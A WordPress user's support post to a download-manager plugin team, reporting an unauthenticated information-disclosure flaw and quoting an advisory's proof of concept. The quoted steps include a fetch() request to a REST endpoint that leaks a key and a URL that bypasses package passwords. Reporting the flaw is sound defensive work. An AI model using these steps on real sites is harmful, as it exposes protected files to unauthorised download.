Hello Download nManager Free Support Team,
I hope you are well. I would like to report a security issue that I have encountered in the latest version of the “Download nManager Free” plugin (version 3.2.76) which I recently updated on my WordPress website. This problem seems to be a vulnerability that allows attackers to access sensitive information without authentication, which is extremely concerning for the security of my website.
The vulnerability is described as follows:
[ Download Manager Pro < 6.3.0 – Unauthenticated Sensitive Information Disclosure
Description
The plugin leaks master key information without the need for a password, allowing attackers to download arbitrary password-protected package files.
Proof of Concept
– Create a password protected package containing one or more files.
– Navigate to the download page of the package (e.g. /download/package1
)
– Inspect the “Download” button beside one of the packaged files. The HTML should look like this:
<button
class=”inddl btn btn-primary btn-sm”
data-pid=”123″
data-file=”12345678″
rel=”https://wpscan-vulnerability-test-bench.ddev.site/download/package1/?wpdmdl=123&ind=12345678″
data-pass=”#pass_113_1679405558600″>
<i class=”fa fa-download”></i>
Download
</button>
– Note the wpdmdl
and ind
URL parameters for later.
– Send a POST request to /wp-json/wpdm/validate-filepass
:
fetch(“/wp-json/wpdm/validate-filepass”, {
“headers”: {
“accept”: “*/*”,
“content-type”: “application/x-www-form-urlencoded; charset=UTF-8”,
},
“body”: “”,
“method”: “POST”,
“credentials”: “include”
}).then(response ► response.text()).then(text ► console.log(text));
– The response will look like the following:
{“success”:true,”downloadurl”:”\/wp-json\/wpdm\/validate-filepass?wpdmdl=0&_wpdmkey=abcdef&ind=”}
– Construct a download URL as follows, using the above _wpdmkey
parameter, as well as the wpdmdl
and ind
parameters from above:
https://wpscan-vulnerability-test-bench.ddev.site/download/package1/?
wpdmdl=123&ind=12345678&_wpdmkey=abcdef
– See that the file may be download from that URL, without any knowledge of its password. ]
Despite having updated the plugin to the latest available version (version 3.2.76), this issue still persists on my website. As a result, I am very concerned about the security of my site and the data of my users.
I kindly request your assistance and guidance in addressing this security issue effectively. Can you please confirm if you are aware of this vulnerability and if you are working on a solution? If so, when can we expect an update that addresses this problem?
The security of my website is of utmost importance, and I would appreciate any help you can provide to resolve this issue urgently. If additional information or access to my website is needed to investigate this problem, I am willing to provide it securely.
I look forward to your response and appreciate your attention to this critical security matter.
I’m sorry if my English is poor, I am Spanish and I am using ChatGPT to translate 🙂
Thank you and regards,
Saray
saray.mc@gmail.com
https://scrapstudio.es/